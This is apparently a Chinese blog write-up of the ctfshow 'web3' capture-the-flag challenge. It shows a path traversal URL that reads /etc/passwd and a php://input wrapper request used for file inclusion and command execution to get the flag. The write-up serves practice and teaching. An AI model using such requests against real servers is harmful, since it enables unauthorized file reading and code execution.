ctfshow—web—web3
2024-09-04 06:57:46
打开靶机
提示是文件包含漏洞
测试成功
https://d7c9f3d7-64d2-4110-a14b-74c61f65893c.chall.ctf.show/?url=../../../../../../../../../../etc/passwd
此题考的是PHP伪协议+文件包含,实现任意命令执行
抓取数据包
https://d7c9f3d7-64d2-4110-a14b-74c61f65893c.chall.ctf.show/?url=php://input
开始试验,查询当前目录下的文件结构
查看ctf_go_go_go文件内容
成功拿到flag
最新文章
- linux install wineQQ
- JDBC总结(含DbUtils组件)
- 记录maven java.lang.String cannot be cast to XX error
- sudo命令使用的几个场景
- 配置ogg异构mysql-oracle 单向同步
- java线程之——synchronized的注意细节
- Oracle操作语言分类
- JavaScript里面三个等号和两个等号有什么区别?
- C# 中==与Equals方法比较
- eclipse如何修改dynamic web module version;——eclipse操作备忘
- POJ 1173 Find them, Catch them
- mac下apache启动关闭操作
- ASP.Net中GridView多层嵌套,用最里层的控件获取到外层GridView
- php中session的运行机制
- php视图操作
- How to use VisualSVN Server and TortoiseSVN to host your codes and control your codes' version
- 5月11日——IOS下如何检测用户是否安装微信
- PHP算法之二分查找
- Write CSV file for a dataset
- stylus导入时 报错These relative modules were not found
热门文章
- Linux修改系统时间为东八区北京时间(上海时间)
- Scala中的IO操作及ArrayBuffer线程安全问题
- [日常摸鱼]Uva11178Morley's Theorem-几何
- PHPCMS V9.6.0 SQL注入漏洞分析
- [GXYCTF2019]simple CPP
- Argo CD使用指南:如何构建一套完整的GitOps?
- CSS的各种重要属性
- [论文分享]Channel Pruning via Automatic Structure Search
- (数据科学学习手札101)funcy:Python中的函数式编程百宝箱
- 收下这款 Vue 项目模版,它将让你的开发效率在 2021 年提高 50%